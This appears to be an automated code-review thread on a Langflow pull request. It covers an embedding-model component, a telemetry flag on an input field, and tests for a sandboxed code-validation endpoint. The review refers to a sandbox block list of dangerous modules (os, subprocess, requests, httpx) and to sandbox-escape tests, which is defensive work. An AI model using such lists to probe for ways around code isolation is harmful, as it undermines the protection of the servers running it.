name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n"

},

"value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = field_value or self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n"

🤖 Prompt for AI Agents

In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json around lines 2018-2019, the ollama_base_url handler ignores the incoming field_value and always uses self.ollama_base_url, which can cause stale model lists; change the handler to use a local variable (e.g., ollama_url = field_value or self.ollama_base_url) and then pass that variable to is_valid_ollama_url and get_ollama_models so updates use the new value when provided while still falling back to the instance attribute if field_value is empty.

coderabbitai · 2025-11-24T01:30:33Z

src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json

+              "input_text": {
+                "_input_type": "BoolInput",
+                "advanced": true,
+                "display_name": "Include the original text in the output",
+                "dynamic": false,
+                "info": "",
+                "list": false,
+                "list_add_label": "Add More",
+                "name": "input_text",
+                "placeholder": "",
+                "required": false,
+                "show": false,
+                "title_case": false,
+                "tool_mode": false,
+                "trace_as_metadata": true,
+                "track_in_telemetry": true,
+                "type": "bool",
+                "value": true
+              },


⚠️ Potential issue | 🟡 Minor

Telemetry/privacy check for input_text flag.

The field tracks as telemetry. Ensure only the boolean is captured (no raw text) and that analytics pipelines don’t infer content from it. If uncertain, disable tracking.

🤖 Prompt for AI Agents

In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json around lines 2038 to 2056, the input_text field is currently configured to be traced and tracked which risks leaking raw text; change configuration so only the boolean value is recorded — set trace_as_metadata to false and track_in_telemetry to false (or remove those flags) and verify no other properties (placeholders, default value, or surrounding logic) send or derive the original text to analytics; if you cannot guarantee analytics will only receive a boolean, disable telemetry entirely for this field.

coderabbitai · 2025-11-24T01:30:33Z

src/backend/tests/unit/api/v1/test_validate.py

+    response = await client.post(
+        "api/v1/validate/code", json={"code": code_trying_to_escape}, headers=logged_in_headers
+    )
+    result = response.json()
+    assert response.status_code == status.HTTP_200_OK
+    # Code executes but in isolation - sys is imported fresh, not server's sys
+
+
+@pytest.mark.usefixtures("active_user")
+async def test_validate_code_allows_safe_code(client: AsyncClient, logged_in_headers):
+    """Test that legitimate safe code still works."""
+    safe_code = """
+from typing import List, Optional
+
+def process(items: List[str]) -> Optional[str]:
+    return items[0] if items else None
+"""
+    response = await client.post("api/v1/validate/code", json={"code": safe_code}, headers=logged_in_headers)
+    result = response.json()
+    assert response.status_code == status.HTTP_200_OK
+    # Should have no errors for safe code
+    assert len(result["imports"]["errors"]) == 0
+    assert len(result["function"]["errors"]) == 0
+
+
+# Isolation verification tests
+#
+# IMPORTANT: These tests verify that the validate endpoint uses the sandbox.
+# The actual isolation behavior is tested in src/lfx/tests/unit/custom/test_sandbox_isolation.py
+# These tests just verify that dangerous code executes without crashing (proves sandbox is used)
+@pytest.mark.usefixtures("active_user")
+async def test_validate_code_allows_safe_imports(client: AsyncClient, logged_in_headers):
+    """Test that safe imports are allowed."""
+    # Code with safe imports should work
+    safe_code = """
+from typing import List, Optional
+import json
+import math
+
+def test(items: List[str]) -> Optional[str]:
+    return json.dumps({"count": math.sqrt(len(items))})
+"""
+    response = await client.post("api/v1/validate/code", json={"code": safe_code}, headers=logged_in_headers)
+    result = response.json()
+    assert response.status_code == status.HTTP_200_OK
+    # Should execute without errors - safe imports are allowed
+    assert len(result["imports"]["errors"]) == 0
+    assert len(result["function"]["errors"]) == 0
+
+
+@pytest.mark.usefixtures("active_user")
+async def test_validate_code_allows_third_party_libraries(client: AsyncClient, logged_in_headers):
+    """Test that third-party libraries (not in a whitelist) can be imported.
+
+    Users should be able to import legitimate third-party libraries like AI libraries,
+    data processing libraries, etc. We only block dangerous system-level modules.
+    """
+    # Try importing a common third-party library that wouldn't be in a whitelist
+    # Using 'requests' as an example - it's a legitimate library but not dangerous
+    # Note: This test will fail if 'requests' isn't installed, but that's okay
+    # The important thing is that if it IS installed, it should be allowed
+    third_party_code = """
+try:
+    import requests
+    HAS_REQUESTS = True
+except ImportError:
+    HAS_REQUESTS = False
+
+def test():
+    return HAS_REQUESTS
+"""
+    response = await client.post("api/v1/validate/code", json={"code": third_party_code}, headers=logged_in_headers)
+    result = response.json()
+    assert response.status_code == status.HTTP_200_OK
+    # Should execute without errors - third-party libraries are allowed
+    # (unless they're in BLOCKED_MODULES like 'os', 'subprocess', etc.)
+    assert len(result["imports"]["errors"]) == 0
+    assert len(result["function"]["errors"]) == 0


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Fix unused result and align third‑party import expectations with sandbox blocklist

In test_validate_code_cannot_access_server_globals (Line 139), result = response.json() is never used, which triggers Ruff F841. Either drop the assignment or assert on the returned payload (for example, that "sys" or "blocked" appears in the combined imports/function errors to confirm the sandbox blocked the module).

In test_validate_code_allows_third_party_libraries, the test asserts that importing requests never produces errors, but the sandbox’s BLOCKED_MODULES currently includes "requests" and "httpx" as dangerous network modules. With that configuration, create_isolated_import("requests", ...) will raise a SecurityViolation, and validate_code will populate imports["errors"], causing this test to fail.

You’ll want to either:

Treat network libraries as allowed during validation (remove requests/httpx from BLOCKED_MODULES), or

Relax this test to something like “if requests is installed and not blocklisted, the import should succeed”, or gate it with pytest.importorskip("requests") and adjust expectations based on the sandbox policy.

Right now, the test’s assertion that “third‑party libraries are allowed” conflicts with the current sandbox blocklist.

🏁 Script executed:

#!/bin/bash # Confirm BLOCKED_MODULES contents and observe validate-code behavior for `requests`. python - << 'PY' from lfx.custom.sandbox import BLOCKED_MODULES print("BLOCKED_MODULES:", sorted(BLOCKED_MODULES)) from lfx.custom.validate import validate_code code = "import requests\n" print("validate_code result:", validate_code(code)) PY

Length of output: 115

The web search results provide general information about Python sandbox patterns, but not the specific codebase. Let me inspect the actual source files directly using shell commands.

--- 🏁 Script executed: ```shell #!/bin/bash # Find and inspect the sandbox and validate modules find . -type f -name "*.py" | grep -E "(sandbox|validate)" | head -20

Length of output: 610

🏁 Script executed:

#!/bin/bash # Search for BLOCKED_MODULES and validate_code in the repo fd -e py -x rg -l "BLOCKED_MODULES|validate_code" {} \; | head -20

Length of output: 484

--- 🏁 Script executed: ```shell #!/bin/bash # Read BLOCKED_MODULES from sandbox.py cat ./src/lfx/src/lfx/custom/sandbox.py | head -100

Length of output: 2782

🏁 Script executed:

#!/bin/bash # Read validate_code function from lfx validate.py cat ./src/lfx/src/lfx/custom/validate.py

Length of output: 18706

🏁 Script executed:

#!/bin/bash # Read the test file around line 139 and the full test functions in question sed -n '136,220p' ./src/backend/tests/unit/api/v1/test_validate.py

Length of output: 3605

--- 🏁 Script executed: ```shell #!/bin/bash # Read create_isolated_import function from sandbox.py cat ./src/lfx/src/lfx/custom/sandbox.py | grep -A 30 "def create_isolated_import"

Length of output: 1546

🏁 Script executed:

#!/bin/bash # Search for any runtime modification of BLOCKED_MODULES rg -n "BLOCKED_MODULES\s*=" ./src/lfx/src/lfx/custom/sandbox.py rg -n "BLOCKED_MODULES\." ./src/lfx/src/lfx/custom/ -A 2 -B 2

Length of output: 0

🏁 Script executed:

#!/bin/bash # Check if there are any fixture or setup functions that modify sandbox behavior in tests sed -n '1,150p' ./src/backend/tests/unit/api/v1/test_validate.py | head -80

Length of output: 2882

Fix unused result variable and address test failure due to blocked requests module

Two issues confirmed:

Line 139 — Unused variable (Ruff F841): result = response.json() is assigned but never used. Either remove the assignment or assert on it (e.g., to confirm the sandbox blocked the module).

test_validate_code_allows_third_party_libraries (lines 199–213) — Test will fail: The test imports requests and expects len(result["imports"]["errors"]) == 0, but requests is explicitly in BLOCKED_MODULES as a dangerous network module. When isolated_import tries to load requests, it raises SecurityViolation, which validate_code catches and appends to the errors list. The assertion will fail.

Choose one approach:

Remove requests and httpx from BLOCKED_MODULES if network access should be allowed during validation, or

Rewrite the test to skip the assertion if the module is blocked, or gate it with pytest.importorskip("requests") and adjust expectations based on your sandbox policy.

🧰 Tools

🪛 GitHub Actions: Ruff Style Check

[error] 139-139: F841 Local variable result is assigned to but never used.

🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used

🤖 Prompt for AI Agents

In src/backend/tests/unit/api/v1/test_validate.py around lines 136–213, fix two issues: at ~line 139 remove the unused assignment `result = response.json()` (or replace it with an assertion using `result` if you intended to validate response content); and for the third-party import test (lines ~199–213) change the test to handle the sandbox policy: use pytest.importorskip("requests") to skip the test when requests is not available, or update the assertions to accept both outcomes (if the sandbox blocks network modules then expect an imports error, otherwise expect zero import errors) so the test reflects whether `requests` is allowed by BLOCKED_MODULES.

coderabbitai · 2025-11-24T01:30:34Z

src/lfx/src/lfx/custom/sandbox.py

+class SecurityViolation(Exception):
+    """Raised when code attempts to escape the sandbox or use blocked operations."""


⚠️ Potential issue | 🟡 Minor

Address Ruff violations: exception naming, long messages, and simple try/except

Ruff is flagging several style issues here:

Line 17: SecurityViolation violates N818 (exception names should end with Error). Either rename the class (e.g., SecurityViolationError) or add a local suppression like class SecurityViolation(Exception): # noqa: N818 if you prefer the current name.

Lines 105–108: The try/except AttributeError: pass around getattr(builtins, name) can be simplified using contextlib.suppress(AttributeError):

-import builtins +import builtins +import contextlib @@ - for name in dir(builtins): - if not name.startswith("_"): - # Block dangerous builtins unless explicitly allowed - if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS: - continue - try: - isolated_builtins[name] = getattr(builtins, name) - except AttributeError: - pass + for name in dir(builtins): + if not name.startswith("_"): + if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS: + continue + with contextlib.suppress(AttributeError): + isolated_builtins[name] = getattr(builtins, name)

Lines ~128–130 and ~160–162: Raising SecurityViolation with long f-strings trips EM102/TRY003/E501. Factor the message into a variable and pass it to the exception:

